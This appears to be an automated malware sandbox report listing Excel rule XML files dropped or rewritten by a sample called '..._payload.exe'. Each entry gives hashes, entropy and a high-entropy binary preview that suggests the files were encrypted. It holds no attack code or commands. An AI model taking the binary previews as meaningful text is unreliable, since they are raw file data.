                                                                                                                          Preview:<?xmlb.Xy..\.D.......O...:._...O..~.....G..U.5r.l....H.m.......nt/'..,.e,....b&.XW{....7..t....{j...\.V...qJ06..38.........k...zxBQI..x....k.d.9..V...J...j.+...B..Kf.Yn.[J.d^#h.Y..h}e.L.vRC..Jn.g8..h}.X8=...E&........y....x..B.W..?...z.=.J6...,....8UG..H/a...h....^M;....S....N...t...E..K...^.u.."....3...p...N..J....bY..:.X.w..a...~._.u-.L..s.m.....Z......P.;7...y....._......&.tY..?.....r...4..E;.va.j3.hX....$o.T....JF.^Z.?.R...']...=.......<y...hA,..NgL.W.NG.a....7...a..\.....d!D.Ur'.....B....}.j.iC.i.I,....]....A.s..m.....J.Y..........ks..4?.V....wO._.6.3.+...S.F....l.%.Yt.g.-y.O.x..wl...Jqxu.-.t.Vgg...[...L!?l..g{.xTxj.\..I ....~.#[..o.!......a...O....2.b...jU.....[p.....F..m...6.#uH$).....3..u....E.V.;/...hj...pl..NZL..>`/_&{........cP.N.\.0..x....(..l....%.c...X.[E.4..p..S0.........#. ......M....<.X...5:'&.O...qR.4?.{.M...^..EB.DG..B...TE..."....oj......k..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule12019v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4150
                                                                                                                          Entropy (8bit):7.957723706851026
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:JLGbx6SLfTLXxZISyymmhl9WtOxAR0D6kxQvS:JLu0SL7zxtyIl9W50D6wn
                                                                                                                          MD5:15E96FE6918CBAC5535C9302CB58E52C
                                                                                                                          SHA1:C2154D2418F49944B6BEDA66E9345212F6B74F32
                                                                                                                          SHA-256:23DDC30E6E2C4870E4B9F2E4CC3DEF07D4524BBE0E5203986D63A88D54F59312
                                                                                                                          SHA-512:3DC0213D08CEC9A7C84E12624A40C1A22AF63C4FFC8AD340919C12526F6D71EA3A64C1AD6A507F2A92700287BF0A441FF0FD6EA31DEC5D5D2C79A5AADF99D532
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..g.i.4..=z..w.k...`.....5...$..2.^P....\/.4L(.......Pu3.........,..[V....e......&k.;5k.7...|....R.Ms.{$......n...*....D.r..s._...;..;.]z.=.L@a ....Li..PE.p.}.....s&W.W.J.G..ZH.gm.WC...m.O..d....~x....t./45...4..fY......6....a}.!!=S....%n...._....D..3U+b...(9*....V..."}^3.AS....Q@...I.[.b..%.w.'9....=.Gl..9.7.*te..R..%..TA\i.4....R..!.|).`....{.....[h.t....u.....W...5[...RP..]pz....?..r}=vc..?k....kz.\.E1...7....aJ..f..!...%.=....J....A...-ok.... ...k.o.0......}.Ea......|....O......s{...^.....M.E....2....l.P..{S..t...z..W...BrZ.!5....|.._..V.c...2..4...h........L..v.z.O.....X..>.". .[.O?j.......U..M0.......%p..<d..j....:..T....&EW.A.....#..T.f2A.V..v.b..f.4._.v...Z...]..$....{3.V..."..n...d.|......C...H..M..Q.....}....C..P..FC...x.o.k^.?.L.j..d...v.X.)..t..r.....,....2.....~ .."..q.'......I..qka.l.Ts.?U..-*..li....)@.#.q+...\.0........v.f..c..v..a.f~..hoe.T.....}..;..)5..sjTG.r........*A_.{ [o.HB...../U...?{5..ve.&.......\%.uf.)..Q..|..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120201v14.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2974
                                                                                                                          Entropy (8bit):7.935510593122622
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:xOFDntigvGFZeTcDkdUvn59fnyr14Q4U+Wt1ZRriThRUJOM4o9V/a4yt0w9VyD:IRtiKGFsT+vn5hyo67RriAJn4OU46c
                                                                                                                          MD5:DAD6DCC7714B13900D219CB4483EAF04
                                                                                                                          SHA1:CE610AF73FE09F541D6FC0E8A9BBFF73EA1EDE7B
                                                                                                                          SHA-256:6A4369EEE5646194097D73C8EC08DADDE1D31876DFE7B95B6D3B8931ACBA9813
                                                                                                                          SHA-512:1F815EDBC45EF821230136B5543C99A4E01EDD96AFFE631DCE3817DDB2BF0DC66766800A629FD1A4E5941EF22F6B561A08F0065FED55F7876FB3D694BFB017FB
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.........=1%.,q.j....[.B|..B|&.fC.O.....&..G7o...SqU.q.^...#!_.<.^..\W..18.D9..%..6....e.v...1..v.c..IM ../..x..1...7....(......I....4....*g:..P.|p.....U ....2P.!k..g#.z.{.:I,..q..........z~..O....a..?.R*...w..<.@.awn....7.f. e..).?.....m....1R..En.. ..\Hs...(.O...\.h8"@Um`.......0..u..rj.../.N.#.....g..|a.?.K..a]...;.sQMh..EW.&1B.^p.v.f..9...<7.b.q..6VYWZ..45<.J.....[.....s..%.(X....Z..Ue.Ub..Z...$J!3.............7...S.#..K;...i..d.....X...Wc.h...38..o6.[.G.....D....e..8.l.X.K.$.Y....{c.HF..9.8..3..[..|..x..5.g........d.....u...$.K^f..u...w.H...n._~L..j&`P>.g.h..+.U...z...I,{....VS2xw#..:.........<scW.....7.G...,..{.#c.5.}.N..R../..2r........sB.T%.".._n.x=p'..d.k]~p...w...E..^.@...#..+D..y.l.M.0.Wnh.`.e...D.M...\.-B.=.9.~..:.......)|..z..;1._.d...M..........H.O....\%....3.H.t.V.!.C.t.|.r...t\.G.U>....sP(..O..?&..%.....|..xmhOC6.WG.=#PMR=......oC.'...b...2M......? ...Q-6....?.xic.N..rx.....J;.....(...&r..<..~H...^.R.Ir....A...S.D..*.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120205v11.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3363
                                                                                                                          Entropy (8bit):7.94372308786122
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:eahPebzSB2cf2/T0M6Lukw1oPvLNfaPU7:eahWbmB0L01LuX1onLJOW
                                                                                                                          MD5:BDEB086B37B1CEB437C81E8A3AE82F4D
                                                                                                                          SHA1:D7E17662E02A4AF83945BDEAB2D4CD2D60A1CA58
                                                                                                                          SHA-256:52D5132A2022C4B06EE5665D2F37655F5DFF7022157F3657A41A8609EC9CC4E8
                                                                                                                          SHA-512:94E503865F670BD5E3157C5FBBEDDBBE5535E8C330FA1D072E71FE44ABD9773C394499B2BEFF5637F98EFC50D54C49DACEC82BCF7E1B2131053E39D0CEBE44E2
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlN.T...<0.Z.....u..|.O...r..O.Q.t7.V%.EC.yS.(mg..R..... .(8.|a.......b^\ .;z~Y...T.u.+.E....T..^.f..e4.>..h.....3...Qn]kg.Y..&..k..mT...j.cG..Eb8.../7.;.%....6&.G./._2....'/...T=....#.?....W.S...G..Q.../....b...,Y.0.......x.....Z../f.G....{..`]W...T~r8...G...r.x..ZJ4....k1..X.l+^.L..%......Iv`CyiE.Ih.D.....b#....ol......'...m.@.!xtY'n.p.}..E..,.3...;...........%..#T.<..L.....:.1......S....%..b........-.F......}.r...V.0..3..VO>[ .s...fO.J5x..u..$.uF.y*..*....TU.......w..r}.txAa1...7@...!..f....9k..OUY.........g....<...N(PZ...X..V.&.s....z.z.._./..'.[......=7c7.g.*..npM.g.....M{.3.S...O.c.....BV....{.XU/.v.NO..-<.?..T.S..a....?o..y.<3.r.9c..9{*D.....]...tKU.s....s..F..K...s...e).$.A....2..eS.N.t~...RJ...n./.f.k.\Wn....t.}.....w\.n..4..d..H&.+....!...'-.P..........,.2.^;.D.K,.0.7...%FS.$..E.l...*..j....f....G.d..c.....eun......&.c...u..........w.7.D2..#|._...R..9.[\4..(.P....6..e......1X(.~D../.[.9Q...C.u\.N^A...(.V.e....w...Z......#@.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120300v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1295
                                                                                                                          Entropy (8bit):7.848690587426975
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:+c1zlaodmqBLOk8oCBYlZnqH5tCjn7PNpEp/LZJObLjAeRIzkybD:+yJaosqooCAZqZtwPNSp/ujlpgD
                                                                                                                          MD5:96B0212913ABCB438C6F6E1A5744913F
                                                                                                                          SHA1:62F82CAE27F34ECAD960529E1784483FAB97FB53
                                                                                                                          SHA-256:0A26329DD6CA7D9B4BB2D31F2A4A5E4A539FA1E0B411DC40FD4D09B7921F2A3E
                                                                                                                          SHA-512:3DB849F6DDF3BFFEADD1E114AE036793256FC865D2EA5E19DDF544D1886F76004D7C997C0D2A829195FD3600EE976AE4721A56D1E7C57B0704053A487B8DEB2E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlN..+.j..y>.[.t..*...u..T..0.T...@~*\H8mc..1k..2..;...z.......]..j.U.xuQ..;N..i.h.:.$.....@)........m...S....-..x]+.7....9.....8...y|.j...-.....&~3....D..........%..,...2~.....`.......X..+.k.'n~.M_._.O.[f.o&.D.A.".o..].>...L.`>..kH...8.$j...O..L..P4.l..?..e7I_[3.$........9.@1...@..N.@.h.egQ|@]|...-.N...:.,.k.g.(<....k-.J8...z.O......~ ....LZ&..ly........'kx...7...s.x...CW........M(...?.G..U..FB..!..QlM.......7./.2..y..P...Kag$b....KR.q.r!...'.!:.4... .4..>....p@.ov.<6.SD.....t.. 7.].......x.?u...kr.]7..1TL.lE....v.H..`}.[!6T...+...S......m.......N...m.?U-.Y.f.\l.....h..]R~............y.3~....,Iz9D.RBG.V.,.'.M...I..Nm.7W...3...!.....'....d6]....G..$...R.4.D.....kU........W....H5JBq0.C...3G>. ..Jwzz.V`-'....4Y..H....:......O.qT.G..F.Kz....q..9../9@-........r.\x.*oSA.!....G.-...d.]!.-.fG...l4...d...}._...;.=...Y..50...T`.<..p8..gO..I...$.....Tm..l.....w........H......^..$.../W......J.H...N.._.....1E..I.!....sIE`...yf.....sNi..1..a<F..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120304v5.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2582
                                                                                                                          Entropy (8bit):7.934967001653189
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:s0EzZ1KBa963Bwpj0c4xTOXjX0M2dsz5M8OPUo0fQLR2IWyjD:5Ezrkepj08Xb0M2dYUUo04LR2gv
                                                                                                                          MD5:C83685094FAD011212CD0EF2A245E601
                                                                                                                          SHA1:F926499808D9782A8EC9FD4C8268DFA7B24E3B7C
                                                                                                                          SHA-256:4A58AEAE8F9FD898D35AFEEB80909D5802456B9E7805014A689E5E76BACA67AB
                                                                                                                          SHA-512:62C693FCD55324E0D423EB0442134C7F6C11F25200B31624D39B860CD3EAC73F8F22148A5DC0454726D1DF5BDE68CC93E9D301785846C9C8484B5D7395B1B6B5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlA..XsI..9.+...>..M.....#1&w.0.8.]H...].`....F.7Z.Pu.R.JnQ:.M.t..xs.j..2..Z.bw.:.....=..5......S..D.%...V..Kg..BT..r#....`h.}l~.%.gT.r....ix..f.@P......!.gg;P{..]..t.A4:1....TX.@S=.t.Y...K=........g.~n.;..b..X...!SK..].?.@....&...DO.S?..[....S....C...)@.U..<D...q.. ~g...U 7$.h....y.".....#..=Wx:.....56....'..+..+.f.C.g O.G.2....Y....w...d9I..b.e...>1....J.M'9.....(.;.#o..`....T.t.,...........`...<...1...gv..`.B............3z....)*5..J.#..%.........R`Nx..FwV2..3.(..u.RW:.^7....%..E.k@.u...j...r..].0f...PRo..B......(.@....{.c...\c....u.A.Z6:.C[..:..q..?....H..x..2.tu...b~.......s|.7....B=......%.....UU*|.z.8M...P....5Q.!.E.?...f....e\Y..##Q."NQo.....wh..G.L=.d.9%...{.-+..'...a.Z...g.3.N.".,..4....zI2y...x......eb.x.d*.L..bV..(o.X....^;.p.....JP._!*.:KvY...p.jR...]7=.K3...}..$.)..&4h..d.Se...N.5....g?..:..L.j......E....C..2.B=...L...z..s.6....&F..).+..#...1.......ui+....U..'....V@.b....EWF...r...m...*....i3..(r.kb$O...Ac.1=..E@..Y

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120305v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1787
                                                                                                                          Entropy (8bit):7.890331973032159
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:032kOkbZDV9hNQqzARQS8tch79woJoVcxMBisWS0tZD:032JcZDVpQq8woicxMYZS0L
                                                                                                                          MD5:4342251B11D7F58338DAB5D0D7AD86C3
                                                                                                                          SHA1:D71A171D72D0FB0309B5A8B9C253CC8EC07C887E
                                                                                                                          SHA-256:D4D8B8EE4FA48FD24EBA407523CC8C95EE55D969874C4DB0429B4FC623C379D5
                                                                                                                          SHA-512:54C3F711368A3E977CED7471CA28AF279032720C0B22E2E8EE823FA403DF37A1B2EE2145381F95041682BA62FE5317E167B355D9A58ED1EC843EECAB2932398B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml<.j*...L.....Gx..V.)i7.Z>...+........K...u.^..|..q.q9.W^..r.l.....{...S..,R..d......^.k...?4..V.w.4..!.......l./..p.K..[W....:g..S!.<..l.G.O...l9t..7.......)... .m.Yr!.".`........8R.-..k..5n...xW.,....%r.....c.g...9W.D..P...e.-FQ$v.....R.7./.V.(....LEW1.T.]...e.....!..{....;.n...lY.96...2|>.@y.Y.pp.......3J.....)B.+.._.&.v.#.._."+<.ZO...6 .1z..|S2..=a-...8.`..n.H..zx.V...W.p~hi)-.._.K.w.T...(.T.~K...\..?..N.4^.4.|...h...-6...#.+.b.c;..>-..k..&.yKth..9.......@...W.7..ls...'{.1z0c.\@;.UMox....Y.{H.)....[u./2....W._*.....A.5...o..:...t.u;.... .|..e8W.L.........&...}3...[UL.l..1..............`.........D.:.sq.M<..^m4&.L.f.>X........]>...p.....Y.A...x.....:.WU.\...kt..O..M...I...u.J....6...C.....\r.s.'..4@..._...CT..5?.an..........3.)?.s..G....C...k....C..y...N....#.V)......@$..... ...q...v.......f,.Ei.#..|X..$L'.......Lw%K..l.J.{\;.>.\.x......7j...Y........MM....[%?..'..>..PU.M........."U>}Y.p.y7.'.....D8.r(.4O.bK....=....$.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120307v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1583
                                                                                                                          Entropy (8bit):7.877604155924312
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Iq06DkKX4IoWcXZ5UximaYgKTdfYjWOq7v0W748aT1T/F98QWXbI6MUIZRsgzmb2:tvOHUkjYp8qAW7A/F9XA9QsgzzF+mD
                                                                                                                          MD5:47FC7B1DF6BCB1D0AC99F1A424105E1D
                                                                                                                          SHA1:9F4665252DDD1752C26C6AC497902DEB1A1FC43B
                                                                                                                          SHA-256:93ED2733DDA84C7D813D7CFC8C70CC6790EA4931F642DB95A1CB5D12C00BA1ED
                                                                                                                          SHA-512:9E306EEF0529E401EE06A6991DA921A7496B5FAA46236AE59DF2B37190883D2067D7810DF221C95DD088DE40E9459F4F8175ED6905B8FAD22C78121BCB576B44
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.*M].....gw....;.%...{6G..b.qG......3..B7..5....k~.....R..0.U...j..+..&........q......qq.E...Jc..o........l.......F....Ic...YZ6..AO..uX`a.s>..b..*../xi....6u.6.&....k....%.....hb.....*t.`....$krG.P.Q...+....#.....M.?..k'8).... ..R...?..4..cN..........N..^.b..lQ;..>.......F....,.B......J+..w...<EC.{.?...].zd..P.....q^...l.....u.N........_.)O..D...%.$.o...>..y..P.YP...-....aeW....s6B."..i`j....R8].s.....6..^.a<..IR7..JU.$..h..Z....gG..5E..~....\..W....[.. ..\.m.`M.@e.:"...].H...MS.......Z...E.T.[.<!.......A.W.L..b.\.O.tQ...w.2p..O.....Ot.@..@$..Zc....(.4.e.....}v]...#....DPE..k.8...8.C9./...x..../M...l....Z.Zm..N[c........3.8S?..v*w."..)B.:..S..<(du<..?..g..r..4.z.P:.":....|..Q...2{.._d>.....l....S.p!t.a.,.ykgPu?vr.....n..D..L..+..>.....s..wc.9......x....5>.%Ky.D.rj..w.d]....m..A].[....h...3.`.I.....;x...'......b.u....U.]_ml...9G..=.:.w.....~t..U..9....G.=1..{...A..nDp...F.B...a.\`.".0..S...a....V......I.2..Rz...%..D..........Ixon/..GI!

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule12035v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2801
                                                                                                                          Entropy (8bit):7.923912433374299
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:EnkatM/I4XheQXS+yo0196FmlW2bfXbmXHZMyquySU6jE2T1G0oxpyemkdTpUYsS:EnQlXhtiessaLmXHPBySU6jnl8ptmkd1
                                                                                                                          MD5:26071BE9C6883E4DD170F80B62FD6811
                                                                                                                          SHA1:1E7BA322290CC47633F5D4476F4F3F0C6763B8CE
                                                                                                                          SHA-256:6CBA3FEA498A72C23EC0622B56B6D1BCD1C3408A1E44E7870CAFB4ED589622E6
                                                                                                                          SHA-512:9DD9F499214567D10A7D556ABB068A0AF7822AA09C034E3ABC990627B1055F8B7F2D80192E436F133786FE6FE9DA3040793B3D2076B5A837B9A92EBAFB1EE01E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml@...0%YE.h$.[....|B..B.......mH+.b...za..^.&...D....^`He...M.N...zJ..G........<0#.9}l.Tc..L....?X..9...i.|EW...K.s..qQ..w ..56guQ.[.Q^#I.kuH....E....x<..Mt..@...(c.jN..).`........v..{.A..4..AW...FJ..8.....;.i..@..4...\..C..W..Z...t3.A.[..B..7BT.mE3./.!F..K..xzG.v.N...T...H$q.zx{M..(:......X...5.i..../..w.......J....4.....=.b|.......x.j..5.z.......:P?m.e..EH.e.....oA),.~|.D...P...r.B`.":..H.......!.T.. .|.].....1...)9........c....r.'..s.5?.....5d..\rN.U}....<Q ...u.4%.R..a..G'.*..........I......P.....|KKX...|..&.~j...>@|.....2.c.<.4J.H....7.&.QunZ..49N...*;BO.K<_@.U...MU.{.=rb.....B.M......8..^yqm....|.j.B...d.y..........0.J5...@.X(c5m.k.-..$..2.w.I<... _D..\.,...j.u.....XL..nic....DUEL..d...x."..`...r.U..h...=M.>s..9.....:U..:A.WM8.S6.v...e..L.....D.JqEB./.Z....h..3N...H'..].~1FYC.DMSNo>|.l.^..7m.+#.,.w...SP....4..~...S..'.[....A:.._.......~pa..3.:.}.8...=W.qW.#7.!....p..$.C....!/:M..}...X..S.a..7..6....t..r..[..E..H.......R..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120402v21.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4121
                                                                                                                          Entropy (8bit):7.953762109799372
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:4Eabu2iyiKlJX2Q8zlGTPPmlKbTgE/rv94F0d:4ZriyiyJXGhGDG3ER
                                                                                                                          MD5:CC94C6FCCDA06F232B9A6EACAE702DF0
                                                                                                                          SHA1:A59A92919402798D60613A4D30422A114D8D72C8
                                                                                                                          SHA-256:3FE8B1822885454731F870DF9B37274F52E81DCCB976C50ACD16D6955175EA45
                                                                                                                          SHA-512:BD00E5743954F83F6439DB2B5814C5FDB950AE15AED1A4B9DC0A082CBAEBB5C3C992546A30CD3CA3942D8ED42777FB3484888C5657F4808FECB01B8BBED62F03
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlp{....v..1...k%{.r.;w7..%.;..Dk...U.D.!L.M..Y.....F.4.-..W..O......p.N.<._.M.X'.G}..qM...[M....P.fk.D...c./.....f...3F...y.S.....o.k4..qsK./bd.F..e.^'....?.Y.u....dG.~}|.X.c..>...8./&.."C...6..?..Y.= .K.=.x...q.v...C....29.8....'R[..]..F....K.-...Z.y..48 ..9tcq..%;....../].E|...E.pH.w.M.&.Cy7m.c......F..R.n5C..LP..>bcr..V.,....U..s...+.\..+..../..6o.3..q......Sw..D.B..>.$M..6Yu-.."...I... .r.R.v.;$.WbaA$Q...l..p4)..$K}..o.cyU.Z.J7.....Z.C.,;5.M.M..[.V....w.Qg.My.E..r._G\J..h..8..#.h.D..d..:.Um..4.?."..4...!F....!.T3.(.].....D..P..w...c..,#...g1;?...!.o.....O...4....v....Z,..M.^...nw.,...w..Uc.....BW}r.q.....VH.......s.j...Xb..G.3....IB....(.J.AA..#......A..B...;....y.....!>......D...E...-.5....S5...C...s..j.XP....ndt..> t..".^d....R.@...h.,.i.B.^\z....F{.V...9..vT.q....8.U{-......2..8.[.s`."."...$..|.=?...`ljw..?....C<....{1.[3RN..n.[.../.!...Z.._.>I.r.@.PB...2.zA1.*8.....'uy...7.'.n.[.6..J.Dxn`.8X..'......f..~R..}..x..NU=%..Rl`...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120501v17.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8140
                                                                                                                          Entropy (8bit):7.978194478290242
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Oegr1A/o14w5uMerUYXEK8hLzT1ebb+z8Guflg0icocFI:OeG2/o14wpY0KizUbyklwcoT
                                                                                                                          MD5:796854D20C68E3E7472AF9AC83297D98
                                                                                                                          SHA1:117CC20D7A088169DE22FA39E1EBA1F1170B476F
                                                                                                                          SHA-256:60C3711132AAB01BFF3EE0F185788F2106A32BBFA547D8D451ADFDB0E2786C9C
                                                                                                                          SHA-512:12E47974C316DAA174EB80606E028B3DDA13065287D45755B6E8AD82C6DE67F3B3F3059CC130AA752D90807A5C223485AB1AC4093DEF358876A1AB0B02B0A257
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml~...$..!5.`q.3.fR&.(>....R6.};.]\=.V7l]>;..$a#d.....z..=...Rq@.....n.`..........4. ...X.u.."n.....@$M./..%.....}I....t._..\T.G1.Fd..H....... .7Ju.+.d....J..k...BG..=.)r.......H0A..w...U.c.....Y...?.i.....W..'......[.^.`."..;..[.....{^."2..-.U.Q.SG.....~"...V([...c......a`.Y...}.(i...E...+........\.P.....HS.....I.{fE&.9.V.z.3e.O.......TnF. 5.~...K..b[@.laB..W..f.s....\.i..Q..."..0,...K..~..2S...;......{..iW.Y.!.go6..C..I..j..=Y...Z....8.,xnS.:fd.m..{...o..M..#.....q.....!.............A....NWp2.}7..A..4....qW...h.8..,..........-.........t......^......B..:.a%......j.xv......7...s).".Z.x.....b..."..B...*^..2X^...8...p......o(...............I..\..M.1..Z..CQQ.:oc,..a(..M..[A.....N...o.S/$ly-....g..z.......4.A.d.CEd{X.h ...(.....J=0.I.-...).....].....d..i|....}{..MT.......8iw/..ri.e..../.....~]..t..$.w.k.... _.:..d....S.@I.\..<..Q.^!.J....T..V..%8.e?..0tQ..4....?Oh.2........?/..#t.K=Y.q..hs.U..p.{.?aET..A....7...y...a~<.{.....o.J....y^...:

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120600v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3313
                                                                                                                          Entropy (8bit):7.940821779902335
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:byjyLsrHr3FRwzo836aTsWn3JELWNGfgRLk/FHb6JfQPyB4FaOHfsyyDYlFD:bqyob74z92LWNGiotHbyfQ6BEauaDs9
                                                                                                                          MD5:CA6D7AE7F2E33E5B6BE123BBA2F8415B
                                                                                                                          SHA1:AA076A54A5CC940C2C65EFF32A9F4A3AC9D76E3E
                                                                                                                          SHA-256:A3EF45DC83406D4C4350DA914A8879DBD6D54A7551D29AE8AEBBFF7855110587
                                                                                                                          SHA-512:42C9AD51ABF5DDB09562F29DB4BA0BDFAD5CA736B0CA1F5C43D8F5B3ACB3FCB99D5F0EBC050EA92F61CA47030FA4B1634918F8AB22714091DED8D69D7CE21F29
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....B>..7^Rx.d;...W.q.]xUB.a....U..9b.X........Z.Y..yE..=...>/.^.u@.+.y.h..>..J... ).V......Rx...|.......8...M..V.J..h.^....'.<4..J..W.4#..[..........<QE...C.....F..<......BVBI...6....*..)x...p.....u.S.#.6..B..V.+P.+L`...JI..{ >Jp..%.i.,...$...A.NK...C<..f%o.|2.. ..4.o..Fb..H....$o..D..f...=......~...=..'<....;..d.Rf..LK..\.1."...h..._|.....Ac....}f......1!D..9.-:.K.$.y..%[i...L.<....b".;.i+P...8.......b.q.pK.......O...C..=...gp\.>X.E....:.T.v.Q....i?..!...-..M.....[.Z...>....]nT.Oc.\.HA....@rH.nXo(T+aQ..N.k...S.h .._...3.I`..6u.*..c.,...b..(4...D,caLF}....+(..3.0.M..._....:#....^..9..~...{....>]..>~....VK.G...z.....S.ql...,\...Z*.5....5.>yPW....y......(;...ac..4o.a>...!e..&3~......l,%V.B..t......k....%...a37.....F..x..kO..E.....0.^.q$....j{.7..Sfg....YM.gS}G.u.G.,mq5.G...;.E.|......)M...F<.H.....!~.A.mnS}m.s*W....X.Rh.P.Z^..........]'....R5..c}Z.i.^...'...B..#...e.....Y.w..+h.".......y.O..7F........W+....u}...m...sn.`9V.'_..y...... ..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120601v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3675
                                                                                                                          Entropy (8bit):7.947537909256738
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:9HVj1eWqs3qbrzXw9kJLNiV4WZWOlFQuaTcqcpi4gq:HjEWzaskn2rWOnecNr
                                                                                                                          MD5:6F31757C3D0DF4CF8EC4236D17DA00D1
                                                                                                                          SHA1:5141589B7EA7CA03D08E758CF2CB6AB407EC30B9
                                                                                                                          SHA-256:CD3CCD98597AE4E7A8EB6AF0E69DA7B3A350E03FD8556FBF81EEC0A3AD7D8DD2
                                                                                                                          SHA-512:572851B6D5EE551CFA6B7E3AE5B24DB47C364ECB064341D0C948283067A9D7C7776FFE72CEBAA54BF6762AC15216D9175F2CD05D5405464B315615629594B0F7
                                                                                                                          Malicious:false
